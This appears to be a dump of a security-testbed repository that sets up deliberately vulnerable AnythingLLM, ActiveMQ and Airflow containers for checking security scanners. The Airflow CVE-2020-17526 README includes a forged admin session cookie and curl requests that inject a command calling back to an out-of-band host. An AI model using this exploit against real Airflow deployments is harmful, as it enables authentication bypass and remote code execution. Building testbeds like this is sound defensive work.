├── .gitignore ├── CONTRIBUTING.md ├── LICENSE ├── README.md ├── anything-llm └── CVE-2024-3104 │ ├── Dockerfile │ ├── README.md │ ├── docker-compose.yml │ └── setup.sh ├── apache ├── activemq │ └── CVE-2023-46604 │ │ ├── README.md │ │ ├── activemq-cve-2023-46604.yaml │ │ └── docker-compose.yml ├── airflow │ ├── CVE-2020-17526 │ │ ├── README.md │ │ ├── docker-compose-secure.yml │ │ ├── docker-compose-vulnerable.yml │ │ └── init-user.py │ └── ExposedUI │ │ ├── DockerfileSafe │ │ ├── DockerfileUnSafe │ │ ├── README.md │ │ ├── docker-compose.yml │ │ ├── webserver_config_safe.py │ │ └── webserver_config_unsafe.py ├── apisix │ └── Default_api_token │ │ ├── README.md │ │ ├── config_api_key_change.yml │ │ ├── config_default.yml │ │ ├── docker-compose-non-vulnerable.yml │ │ └── docker-compose.yml ├── flink │ ├── CVE-2020-17519 │ │ └── README.md │ └── apache-flink.yaml ├── hive │ └── weak_credentials │ │ ├── README.md │ │ ├── base.ldif │ │ ├── docker-compose.yml │ │ └── hive-site.xml ├── http │ └── CVE-2021-41773 │ │ └── README.md ├── mod_proxy │ └── CVE-2021-40438 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── apache-mod-proxy-cve-2021-40438.yaml │ │ └── config │ │ └── httpd.conf ├── nifi_api │ └── exposed_ui │ │ ├── README.md │ │ └── apache_nifi_api.yaml ├── ofbiz │ └── cve-2024-32113 │ │ ├── README.md │ │ ├── check_vulnerability.py │ │ ├── make_patched.sh │ │ └── make_vulnerable.sh ├── solr │ ├── CVE-2019-12409 │ │ ├── README.md │ │ └── apache-solr-cve-2019-12409.yaml │ └── CVE-2019-17558 │ │ ├── README.md │ │ └── apache-solr-cve-2019-17558.yaml ├── spark │ ├── CVE-2022-33891 │ │ ├── README.md │ │ ├── fixed-docker-compose.yml │ │ └── vuln-docker-compose.yml │ ├── exposed_api │ │ ├── README.md │ │ └── docker-compose.yml │ └── exposed_ui │ │ ├── README.md │ │ └── docker-compose.yml ├── structs │ ├── CVE-2017-5638 │ │ ├── README.md │ │ └── apache-struts-cve-2017-5638.yaml │ └── CVE-2017-9805 │ │ ├── README.md │ │ └── apache-struts-cve-2017-9805.yaml ├── tomcat │ ├── 
CVE-2017-12617 │ │ ├── Dockerfile │ │ ├── README.md │ │ └── web.xml │ ├── CVE-2020-1938 │ │ ├── README.md │ │ └── tomcat_ghostcat.yaml │ └── weak_credentials │ │ ├── docker-compose.yml │ │ └── tomcat.md └── zeppelin │ └── exposed_ui │ ├── README.md │ └── zeppelin.yaml ├── archery_range ├── README.md ├── sqli │ ├── README.md │ ├── __init__.py │ ├── app.py │ ├── blueprints │ │ ├── googlesql │ │ │ └── googlesql.py │ │ ├── mysql │ │ │ └── mysql.py │ │ └── postgresql │ │ │ └── postgresql.py │ ├── custom_message_error.py │ ├── database │ │ ├── mysql │ │ │ └── init.sql │ │ └── postgresql │ │ │ └── init.sql │ ├── googlesql_database │ │ ├── csv_files │ │ │ ├── cartitems.csv │ │ │ ├── carts.csv │ │ │ ├── items.csv │ │ │ └── users.csv │ │ └── db_init.py │ ├── requirements.txt │ ├── templates │ │ ├── error.html │ │ ├── index.html │ │ ├── index_database.html │ │ └── items.html │ └── test_case_decorator.py ├── xss │ ├── README.md │ ├── __init__.py │ ├── app.py │ ├── components │ │ ├── __init__.py │ │ ├── constants.py │ │ ├── context.py │ │ ├── processor.py │ │ ├── sink.py │ │ └── source.py │ ├── requirements.txt │ └── templates │ │ ├── index.html │ │ └── source.html └── xxe │ ├── README.md │ ├── app.py │ ├── requirements.txt │ └── templates │ ├── index.html │ └── reflect_xml_post.html ├── argo-cd ├── CVE-2022-29165 │ └── README.md └── weak_credentials │ └── README.md ├── atlassian ├── bitbucket │ └── CVE-2022-36804 │ │ └── README.md └── confluence │ └── CVE-2023-22518 │ └── README.md ├── bentoml ├── Dockerfile ├── README.md ├── docker-compose-safe.yml ├── docker-compose-vulnerable.yml ├── exploit.py └── service.py ├── couchbase └── weak_credentials │ └── couchbase.md ├── drupal ├── CVE-2018-7600 │ ├── README.md │ └── drupal-cve-2018-7600.yaml └── CVE-2019-6340 │ ├── README.md │ └── drupal-cve-2019-6340.yaml ├── ftp └── weak_credentials │ ├── docker-compose.yml │ └── ftp.md ├── geoserver └── cve_2024_36401 │ ├── README.md │ ├── docker-compose-safe.yml │ └── 
docker-compose-vuln.yml ├── gradio └── CVE-2023-51449 │ ├── README.md │ ├── non-vulnerable.Dockerfile │ ├── test_app.py │ └── vulnerable.Dockerfile ├── grafana └── weak_credentials │ ├── Dockerfile.Grafana │ ├── grafana.md │ └── runAndBuildGraphana.sh ├── h2o └── exposed_ui │ ├── README.md │ ├── challenge │ ├── Dockerfile │ ├── chal.sh │ └── nsjail.cfg │ └── h2o.yaml ├── intel └── neural-compressor │ └── CVE-2024-22476 │ ├── Fixed.Dockerfile │ ├── README.md │ ├── Vulnerable.Dockerfile │ └── task_request.json ├── jenkins ├── CVE-2017-1000353 │ ├── README.md │ └── jenkins.yaml ├── CVE-2024-23897 │ └── README.md └── weak_credentials │ └── jenkins.md ├── joomla ├── CVE-2015-8562 │ ├── README.md │ ├── joomla.yaml │ ├── joomla_img │ │ ├── Dockerfile │ │ └── config │ │ │ ├── configuration.php │ │ │ └── custom_entry.sh │ ├── mysql.yaml │ └── mysql_img │ │ ├── Dockerfile │ │ └── config │ │ └── joomla.sql ├── CVE-2023-23752 │ ├── Readme.md │ ├── docker-compose-safe.yml │ └── docker-compose-vulnerable.yml └── weak_credentials │ ├── docker-compose.yml │ └── joomla.md ├── jupyter └── exposed_ui │ ├── README.md │ └── jupyter.yaml ├── liferay └── liferay-portal │ └── CVE-2020-7961 │ ├── README.md │ └── liferay-portal.yaml ├── magento └── CVE-2024-34102_CosmicSting │ ├── README.md │ ├── apply-patch.sh │ ├── docker-compose-safe.yml │ └── docker-compose-vuln.yml ├── microsoft ├── mssql │ └── weak_credentials │ │ └── mssql.md └── rdp │ └── weak_credentials │ └── rdp.md ├── mlflow ├── CVE-2023-1177 │ ├── README.md │ ├── docker-compose.yml │ └── mlflow-vuln │ │ └── Dockerfile ├── CVE-2023-6014 │ ├── README.md │ └── challenge │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── chal.sh │ │ └── nsjail.cfg ├── CVE-2023-6977 │ └── README.md ├── CVE-2024-2928 │ └── README.md └── weak_credentials │ └── README.md ├── mongodb └── weak_credentials │ └── mongodb.md ├── mysql └── weak_credentials │ └── mysql.md ├── nodejs └── node-red │ ├── CVE-2021-3223 │ ├── Dockerfile │ ├── README.md │ └── 
node_red_cve_2021_3223.yaml │ └── exposedui │ └── README.md ├── oracle └── weblogic │ └── CVE-2020-14883 │ ├── Dockerfile │ ├── README.md │ └── weblogic_cve_2020_14883.yaml ├── others └── http_auth │ └── weak_credentials │ └── http_auth.md ├── papercut └── ng_mf │ └── CVE-2023-27350 │ ├── Dockerfile │ ├── Readme.md │ ├── assets │ ├── cupsd.conf │ ├── image_setup.py │ ├── server.properties │ ├── setup.sh │ └── startup.sh │ ├── docker-bake.hcl │ └── local_builder.sh ├── php ├── arbitrary_file_write_php │ ├── Dockerfile │ ├── README.md │ ├── index.php │ └── startup.sh ├── phpunit │ └── CVE-2017-9841 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── docker-entrypoint.sh │ │ └── phpunit-cve-2017-9841.yaml └── rce_and_arbitrary_file_read_php │ ├── Dockerfile │ ├── README.md │ ├── index.php │ └── startup.sh ├── postgres └── weak_credentials │ └── postgres.md ├── rabbitmq └── weak_credentials │ ├── Dockerfile │ └── README.md ├── ray └── CVE-2023-48022 │ ├── README.md │ └── ray.yaml ├── redis └── CVE-2022-0543 │ └── README.md ├── roxy-wi └── cve_2022_31137 │ ├── README.md │ ├── docker-compose-safe.yml │ └── docker-compose.yml ├── rstudio └── weak_credentials │ ├── Dockerfile │ └── README.md ├── selenium └── selenium_grid_rce_via_exposed_server │ └── selenium_grid_chrome.md ├── slurm └── exposed_rest_api │ ├── README.md │ ├── docker-compose.yml │ ├── rest_api_test.json │ └── slurm │ ├── Dockerfile │ ├── cgroup.conf │ ├── entrypoint.sh │ ├── jwt_hs256.key │ └── slurm.conf ├── smb └── weak_credentials │ └── smb.md ├── spring └── spring_cloud │ └── spring_cloud_function │ └── CVE-2022-22963 │ ├── README.md │ └── spring-cloud-function.yaml ├── ssh └── weak_credentials │ ├── Dockerfile │ └── ssh.md ├── strapi └── CVE-2023-22893 │ ├── README.md │ ├── non-vulnerable.Dockerfile │ └── vulnerable.Dockerfile ├── telnet └── weak_credentials │ └── telnet.md ├── triton └── triton-inference-server │ ├── ASimpleModel │ ├── 1 │ │ └── model.py │ └── config.pbtxt │ └── README.md ├── vbulletin └── 
CVE-2019-16759 │ ├── README.md │ └── vbulletin_cve_2019_16759.yaml ├── vnc └── weak_credentials │ └── vnc.md ├── wordpress ├── unfinished_installation │ ├── README.md │ ├── mysql.yaml │ └── wordpress.yaml └── weak_credentials │ ├── docker-compose.yml │ └── wordpress.md ├── xrdp └── weak_credentials │ └── README.md ├── xwiki └── CVE-2024-21650 │ ├── README.md │ ├── env-true-negative │ └── env-true-positive └── zenml └── Exposed_UI ├── DockerfileUnSafe ├── README.md └── docker-compose.yml /.gitignore: -------------------------------------------------------------------------------- 1 | # Gradle 2 | build 3 | gradle.properties 4 | .gradle 5 | local.properties 6 | out 7 | 8 | # IntelliJ IDEA 9 | .idea 10 | *.iml 11 | *.ipr 12 | *.iws 13 | classes 14 | 15 | # Eclipse 16 | .classpath 17 | .factorypath 18 | .project 19 | .settings 20 | bin 21 | eclipsebin 22 | 23 | # OS X 24 | .DS_Store 25 | 26 | # Emacs 27 | *~ 28 | \#*\# 29 | 30 | # VSCode history 31 | .history 32 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # How to Contribute 2 | 3 | We'd love to accept your patches and contributions to this project. There are 4 | just a few small guidelines you need to follow. 5 | 6 | ## Contributor License Agreement 7 | 8 | Contributions to this project must be accompanied by a Contributor License 9 | Agreement. You (or your employer) retain the copyright to your contribution; 10 | this simply gives us permission to use and redistribute your contributions as 11 | part of the project. Head over to to see 12 | your current agreements on file or to sign a new one. 13 | 14 | You generally only need to submit a CLA once, so if you've already submitted one 15 | (even if it was for a different project), you probably don't need to do it 16 | again. 
17 | 18 | ## Code reviews 19 | 20 | All submissions, including submissions by project members, require review. We 21 | use GitHub pull requests for this purpose. Consult 22 | [GitHub Help](https://help.github.com/articles/about-pull-requests/) for more 23 | information on using pull requests. 24 | 25 | ## Community Guidelines 26 | 27 | This project follows 28 | [Google's Open Source Community Guidelines](https://opensource.google.com/conduct/). 29 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Testbeds for Security Scanner 2 | 3 | This project aims to provide a central repository for testbeds contents usable 4 | to assert the quality and functionality of security scanners. This includes 5 | 0-day and 1-day scanning capabilities. 6 | 7 | ## Testbed contents 8 | 9 | The tesbed contents are logically grouped into different sub projects. E.g., 10 | the `archery_range` is the 0-day testbed hosting different applications that 11 | help to assert functionality and quality of a 0-day black box scanner. Each 12 | subfolder provides detailed instructions on the type of vulnerabilities it hosts 13 | and provides instructions for setting up and running the testbed containers. 14 | 15 | For now, we merely provide the testbed contents source, but we might, in the 16 | future, provided a uniform build setup for all of the testbed applications. 17 | 18 | ## Contributing 19 | 20 | Read how to [contribute](CONTRIBUTING.md). 21 | 22 | ## Source Code Headers 23 | 24 | Every file containing source code must include copyright and license 25 | information. This includes any JS/CSS files that you might be serving out to 26 | browsers. (This is to help well-intentioned people avoid accidental copying that 27 | doesn't comply with the license.) 
28 | 29 | Apache header: 30 | 31 | ``` 32 | Copyright 2022 Google LLC 33 | 34 | Licensed under the Apache License, Version 2.0 (the "License"); 35 | you may not use this file except in compliance with the License. 36 | You may obtain a copy of the License at 37 | 38 | https://www.apache.org/licenses/LICENSE-2.0 39 | 40 | Unless required by applicable law or agreed to in writing, software 41 | distributed under the License is distributed on an "AS IS" BASIS, 42 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 43 | See the License for the specific language governing permissions and 44 | limitations under the License. 45 | ``` 46 | 47 | ## Disclaimer 48 | 49 | Security Testbeds is not an officially supported Google product. 50 | -------------------------------------------------------------------------------- /anything-llm/CVE-2024-3104/Dockerfile: -------------------------------------------------------------------------------- 1 | # Setup base image 2 | FROM ubuntu:jammy-20230522 AS base 3 | 4 | 5 | ############################################# 6 | FROM base AS build-amd64 7 | RUN echo "Preparing build of AnythingLLM image for non-ARM architecture" 8 | 9 | RUN DEBIAN_FRONTEND=noninteractive apt-get update && \ 10 | DEBIAN_FRONTEND=noninteractive apt-get install -yq --no-install-recommends \ 11 | curl gnupg libgfortran5 libgbm1 tzdata netcat \ 12 | libasound2 libatk1.0-0 libc6 libcairo2 libcups2 libdbus-1-3 libexpat1 libfontconfig1 \ 13 | libgcc1 libglib2.0-0 libgtk-3-0 libnspr4 libpango-1.0-0 libx11-6 libx11-xcb1 libxcb1 \ 14 | libxcomposite1 libxcursor1 libxdamage1 libxext6 libxfixes3 libxi6 libxrandr2 libxrender1 \ 15 | libxss1 libxtst6 ca-certificates fonts-liberation libappindicator1 libnss3 lsb-release \ 16 | xdg-utils git build-essential ffmpeg && \ 17 | mkdir -p /etc/apt/keyrings && \ 18 | curl -fsSL https://deb.nodesource.com/gpgkey/nodesource-repo.gpg.key | gpg --dearmor -o /etc/apt/keyrings/nodesource.gpg && \ 19 | echo "deb 
[signed-by=/etc/apt/keyrings/nodesource.gpg] https://deb.nodesource.com/node_18.x nodistro main" | tee /etc/apt/sources.list.d/nodesource.list && \ 20 | apt-get update && \ 21 | apt-get install -yq --no-install-recommends nodejs && \ 22 | curl -LO https://github.com/yarnpkg/yarn/releases/download/v1.22.19/yarn_1.22.19_all.deb \ 23 | && dpkg -i yarn_1.22.19_all.deb \ 24 | && rm yarn_1.22.19_all.deb 25 | 26 | # Create a group and user with specific UID and GID 27 | RUN groupadd -g 1000 anythingllm && \ 28 | useradd -u 1000 -m -d /app -s /bin/bash -g anythingllm anythingllm && \ 29 | mkdir -p /app/frontend/ /app/server/ /app/collector/ && chown -R anythingllm:anythingllm /app 30 | 31 | # Copy docker helper scripts 32 | COPY ./docker/docker-entrypoint.sh /usr/local/bin/ 33 | COPY ./docker/docker-healthcheck.sh /usr/local/bin/ 34 | COPY --chown=anythingllm:anythingllm ./docker/.env.example /app/server/.env 35 | 36 | # Ensure the scripts are executable 37 | RUN chmod +x /usr/local/bin/docker-entrypoint.sh && \ 38 | chmod +x /usr/local/bin/docker-healthcheck.sh 39 | 40 | ############################################# 41 | # COMMON BUILD FLOW FOR ALL ARCHS 42 | ############################################# 43 | FROM build-amd64 AS build 44 | RUN echo "Running common build flow of AnythingLLM image for all architectures" 45 | 46 | USER anythingllm 47 | WORKDIR /app 48 | 49 | # Install frontend dependencies 50 | FROM build as frontend-deps 51 | 52 | COPY ./frontend/package.json ./frontend/yarn.lock ./frontend/ 53 | RUN cd ./frontend/ && yarn install --network-timeout 100000 && yarn cache clean 54 | 55 | # Install server dependencies 56 | FROM build as server-deps 57 | COPY ./server/package.json ./server/yarn.lock ./server/ 58 | RUN cd ./server/ && yarn install --production --network-timeout 100000 && yarn cache clean 59 | 60 | # Compile Llama.cpp bindings for node-llama-cpp for this operating system. 
61 | USER root 62 | RUN cd ./server && npx --no node-llama-cpp download 63 | USER anythingllm 64 | 65 | # Build the frontend 66 | FROM frontend-deps as build-stage 67 | COPY ./frontend/ ./frontend/ 68 | RUN cd ./frontend/ && yarn build && yarn cache clean 69 | 70 | # Setup the server 71 | FROM server-deps as production-stage 72 | COPY --chown=anythingllm:anythingllm ./server/ ./server/ 73 | 74 | # Copy built static frontend files to the server public directory 75 | COPY --from=build-stage /app/frontend/dist ./server/public 76 | 77 | # Copy the collector 78 | COPY --chown=anythingllm:anythingllm ./collector/ ./collector/ 79 | 80 | # Install collector dependencies 81 | ENV PUPPETEER_DOWNLOAD_BASE_URL=https://storage.googleapis.com/chrome-for-testing-public 82 | RUN cd /app/collector && yarn install --production --network-timeout 100000 && yarn cache clean 83 | 84 | # Migrate and Run Prisma against known schema 85 | RUN cd ./server && npx prisma generate --schema=./prisma/schema.prisma 86 | RUN cd ./server && npx prisma migrate deploy --schema=./prisma/schema.prisma 87 | 88 | # Setup the environment 89 | ENV NODE_ENV=production 90 | ENV ANYTHING_LLM_RUNTIME=docker 91 | 92 | # Expose the server port 93 | EXPOSE 3001 94 | 95 | # Setup the healthcheck 96 | HEALTHCHECK --interval=1m --timeout=10s --start-period=1m \ 97 | CMD /bin/bash /usr/local/bin/docker-healthcheck.sh || exit 1 98 | 99 | # Run the server 100 | ENTRYPOINT ["/bin/bash", "/usr/local/bin/docker-entrypoint.sh"] 101 | -------------------------------------------------------------------------------- /anything-llm/CVE-2024-3104/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | 3 | services: 4 | anything-llm: 5 | container_name: anything-llm 6 | image: anything-llm:latest 7 | build: 8 | context: ../. 
9 | dockerfile: ./docker/Dockerfile 10 | args: 11 | ARG_UID: ${UID:-1000} 12 | ARG_GID: ${GID:-1000} 13 | cap_add: 14 | - SYS_ADMIN 15 | volumes: 16 | - "./.env:/app/server/.env" 17 | - "../server/storage:/app/server/storage" 18 | - "../collector/hotdir/:/app/collector/hotdir" 19 | - "../collector/outputs/:/app/collector/outputs" 20 | user: "${UID:-1000}:${GID:-1000}" 21 | env_file: 22 | - .env 23 | network_mode: "host" 24 | extra_hosts: 25 | - "host.docker.internal:host-gateway" 26 | -------------------------------------------------------------------------------- /anything-llm/CVE-2024-3104/setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | git clone https://github.com/Mintplex-Labs/anything-llm.git 4 | cd anything-llm 5 | git reset --hard fde905aac 6 | touch server/storage/anythingllm.db 7 | cd docker/ 8 | cp .env.example .env 9 | cp ../../Dockerfile ./Dockerfile 10 | cp ../../docker-compose.yml ./docker-compose.yml 11 | docker-compose up -d --build 12 | -------------------------------------------------------------------------------- /apache/activemq/CVE-2023-46604/README.md: -------------------------------------------------------------------------------- 1 | # Apache ActiveMQ CVE-2023-46604 2 | 3 | Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. 4 | 5 | ## Docker-compose 6 | You can deploy the vulnerable version of Apache ActiveMQ by running in docker-compose: 7 | ```sh 8 | docker-compose -f docker-compose.yml up 9 | ``` 10 | It takes several minutes to wait for the service to be accessed normally, and the exposed web service port is [8161],tcp port is [61616]. but the vulnerability is only exposed on port 61616. 
11 | 12 | ## Kubernetes 13 | Or you can deploy the vulnerable version of Apache ActiveMQ by running in kubernetes: 14 | ```sh 15 | kubectl apply -f apache-activemq-cve-2023-46604.yaml 16 | ``` 17 | The Kubernetes deployment will create a service named `apache-activemq-cve-2023-46604` listening on port `61616`. 18 | -------------------------------------------------------------------------------- /apache/activemq/CVE-2023-46604/activemq-cve-2023-46604.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the unprotected Apache ActiveMQ service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-activemq-cve-2023-46604 6 | labels: 7 | app: apache-activemq-cve-2023-46604 8 | spec: 9 | ports: 10 | - protocol: TCP 11 | port: 61616 12 | targetPort: 61616 13 | selector: 14 | app: apache-activemq-cve-2023-46604 15 | type: LoadBalancer 16 | --- 17 | # The vulnerable Apache ActiveMQ service. 18 | apiVersion: apps/v1 19 | kind: Deployment 20 | metadata: 21 | name: apache-activemq-cve-2023-46604 22 | labels: 23 | app: apache-activemq-cve-2023-46604 24 | spec: 25 | selector: 26 | matchLabels: 27 | app: apache-activemq-cve-2023-46604 28 | tier: frontend 29 | strategy: 30 | type: Recreate 31 | template: 32 | metadata: 33 | labels: 34 | app: apache-activemq-cve-2023-46604 35 | tier: frontend 36 | spec: 37 | containers: 38 | - name: apache-activemq-cve-2023-46604 39 | image: symptoma/activemq:5.17.3 40 | ports: 41 | - containerPort: 61616 42 | -------------------------------------------------------------------------------- /apache/activemq/CVE-2023-46604/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | services: 3 | activemq: 4 | image: symptoma/activemq:5.17.3 5 | ports: 6 | - "61616:61616" 7 | - "8161:8161" 8 | - "5005:5005" 9 | -------------------------------------------------------------------------------- 
/apache/airflow/CVE-2020-17526/README.md: -------------------------------------------------------------------------------- 1 | # requirements setup 2 | spin up an `Ubuntu 22.04` fresh instance and log in as root. 3 | ```bash 4 | apt update 5 | apt install dos2unix 6 | wget -q -O - "https://get.docker.com/" | dos2unix | bash 7 | # clone the repo 8 | # cd security-testbeds/apache/airflow/CVE-2020-17526 9 | ``` 10 | # setup Vulnerable instance 11 | ## Initialize the database 12 | ```bash 13 | docker compose -f docker-compose-vulnerable.yml run airflow-init 14 | ``` 15 | ## Start service 16 | ```bash 17 | docker compose -f docker-compose-vulnerable.yml up -d 18 | ``` 19 | ## test the exploit 20 | ### simple test 21 | ```bash 22 | curl 'http://127.0.0.1:8080/admin/' -H 'Cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlLCJ1c2VyX2lkIjoiMSJ9.ZgdmZA.GDwzAupY1c9AXYDbLRvjSiZCVw0' 23 | ``` 24 | in a successfull exploitation, you should not be redirected to login page. on the other hand, you should receive the list of DAGs. 25 | ### test with OOB 26 | ```bash 27 | # first grab a CSRF token and the new session cookie 28 | curl 'http://127.0.0.1:8080/admin/' -v -H 'Cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlLCJ1c2VyX2lkIjoiMSJ9.ZgdmZA.GDwzAupY1c9AXYDbLRvjSiZCVw0' | grep 'var CSRF = "' 29 | 30 | # update session cookie and X-CSRFToken values from previous request 31 | # enable the vulnerable DAG 32 | curl 'http://127.0.0.1:8080/admin/airflow/paused?is_paused=true&dag_id=example_trigger_target_dag' -X 'POST' -H 'Cookie: session=REPLACE_HERE' -H 'Referer: http://127.0.0.1:8080/admin/airflow/tree?dag_id=example_trigger_target_dag' -H 'X-CSRFToken: REPLACE_HERE' 33 | 34 | # update session cookie and X-CSRFToken values from previous request 35 | # send the payload to vulnerable DAG, replace HOSTNAME and PORT to yours. 
36 | curl 'http://127.0.0.1:8080/admin/airflow/trigger?dag_id=example_trigger_target_dag&origin=%2Fadmin%2Fairflow%2Ftree%3Fdag_id%3Dexample_trigger_target_dag' -X POST -H 'Cookie: session=REPLACE_HERE' --data-raw 'csrf_token=REPLACE_HERE&dag_id=example_trigger_target_dag&origin=%2Fadmin%2Fairflow%2Ftree%3Fdag_id%3Dexample_trigger_target_dag&conf=%7B%22message%22%3A%22%60curl+HOSTNAME%3APORT%60%22%7D' 37 | ``` 38 | # setup secure instance 39 | ## Initialize the database 40 | ```bash 41 | docker compose -f docker-compose-secure.yml run airflow-init 42 | ``` 43 | ## Start service 44 | ```bash 45 | docker compose -f docker-compose-secure.yml up -d 46 | ``` 47 | 48 | Ref: 49 | https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-17526 50 | -------------------------------------------------------------------------------- /apache/airflow/CVE-2020-17526/docker-compose-secure.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | x-airflow-common: 3 | &airflow-common 4 | image: vulhub/airflow:1.10.14 5 | environment: 6 | &airflow-common-env 7 | AIRFLOW__CORE__EXECUTOR: CeleryExecutor 8 | AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow 9 | AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow 10 | AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0 11 | AIRFLOW__CORE__FERNET_KEY: '' 12 | AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true' 13 | AIRFLOW__CORE__LOAD_EXAMPLES: 'true' 14 | AIRFLOW__WEBSERVER__AUTHENTICATE: 'true' 15 | AIRFLOW__WEBSERVER__AUTH_BACKEND: 'airflow.contrib.auth.backends.password_auth' 16 | user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}" 17 | depends_on: 18 | redis: 19 | condition: service_healthy 20 | postgres: 21 | condition: service_healthy 22 | 23 | services: 24 | postgres: 25 | image: postgres:13-alpine 26 | environment: 27 | POSTGRES_USER: airflow 28 | POSTGRES_PASSWORD: airflow 29 | POSTGRES_DB: airflow 30 | 
healthcheck: 31 | test: ["CMD", "pg_isready", "-U", "airflow"] 32 | interval: 5s 33 | retries: 5 34 | 35 | redis: 36 | image: redis:5-alpine 37 | healthcheck: 38 | test: ["CMD", "redis-cli", "ping"] 39 | interval: 5s 40 | timeout: 30s 41 | retries: 50 42 | 43 | airflow-webserver: 44 | <<: *airflow-common 45 | command: webserver 46 | ports: 47 | - 8080:8080 48 | healthcheck: 49 | test: ["CMD", "curl", "--fail", "http://localhost:8080/health"] 50 | interval: 10s 51 | timeout: 10s 52 | retries: 5 53 | 54 | airflow-scheduler: 55 | <<: *airflow-common 56 | command: scheduler 57 | healthcheck: 58 | test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"'] 59 | interval: 10s 60 | timeout: 10s 61 | retries: 5 62 | 63 | airflow-worker: 64 | <<: *airflow-common 65 | command: worker 66 | healthcheck: 67 | test: 68 | - "CMD-SHELL" 69 | - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"' 70 | interval: 10s 71 | timeout: 10s 72 | retries: 5 73 | 74 | airflow-init: 75 | <<: *airflow-common 76 | entrypoint: python /opt/airflow/init-user.py 77 | volumes: 78 | - ./init-user.py:/opt/airflow/init-user.py 79 | environment: 80 | <<: *airflow-common-env 81 | _AIRFLOW_DB_UPGRADE: 'true' 82 | 83 | flower: 84 | <<: *airflow-common 85 | command: flower 86 | ports: 87 | - 5555:5555 88 | healthcheck: 89 | test: ["CMD", "curl", "--fail", "http://localhost:5555/"] 90 | interval: 10s 91 | timeout: 10s 92 | retries: 5 93 | -------------------------------------------------------------------------------- /apache/airflow/CVE-2020-17526/docker-compose-vulnerable.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | x-airflow-common: 3 | &airflow-common 4 | image: vulhub/airflow:1.10.10 5 | environment: 6 | &airflow-common-env 7 | AIRFLOW__CORE__EXECUTOR: CeleryExecutor 8 | AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow 9 | 
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow 10 | AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0 11 | AIRFLOW__CORE__FERNET_KEY: '' 12 | AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true' 13 | AIRFLOW__CORE__LOAD_EXAMPLES: 'true' 14 | AIRFLOW__WEBSERVER__AUTHENTICATE: 'true' 15 | AIRFLOW__WEBSERVER__AUTH_BACKEND: 'airflow.contrib.auth.backends.password_auth' 16 | user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}" 17 | depends_on: 18 | redis: 19 | condition: service_healthy 20 | postgres: 21 | condition: service_healthy 22 | 23 | services: 24 | postgres: 25 | image: postgres:13-alpine 26 | environment: 27 | POSTGRES_USER: airflow 28 | POSTGRES_PASSWORD: airflow 29 | POSTGRES_DB: airflow 30 | healthcheck: 31 | test: ["CMD", "pg_isready", "-U", "airflow"] 32 | interval: 5s 33 | retries: 5 34 | 35 | redis: 36 | image: redis:5-alpine 37 | healthcheck: 38 | test: ["CMD", "redis-cli", "ping"] 39 | interval: 5s 40 | timeout: 30s 41 | retries: 50 42 | 43 | airflow-webserver: 44 | <<: *airflow-common 45 | command: webserver 46 | ports: 47 | - 8080:8080 48 | healthcheck: 49 | test: ["CMD", "curl", "--fail", "http://localhost:8080/health"] 50 | interval: 10s 51 | timeout: 10s 52 | retries: 5 53 | 54 | airflow-scheduler: 55 | <<: *airflow-common 56 | command: scheduler 57 | healthcheck: 58 | test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"'] 59 | interval: 10s 60 | timeout: 10s 61 | retries: 5 62 | 63 | airflow-worker: 64 | <<: *airflow-common 65 | command: worker 66 | healthcheck: 67 | test: 68 | - "CMD-SHELL" 69 | - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"' 70 | interval: 10s 71 | timeout: 10s 72 | retries: 5 73 | 74 | airflow-init: 75 | <<: *airflow-common 76 | entrypoint: python /opt/airflow/init-user.py 77 | volumes: 78 | - ./init-user.py:/opt/airflow/init-user.py 79 | environment: 80 | <<: *airflow-common-env 81 | _AIRFLOW_DB_UPGRADE: 'true' 
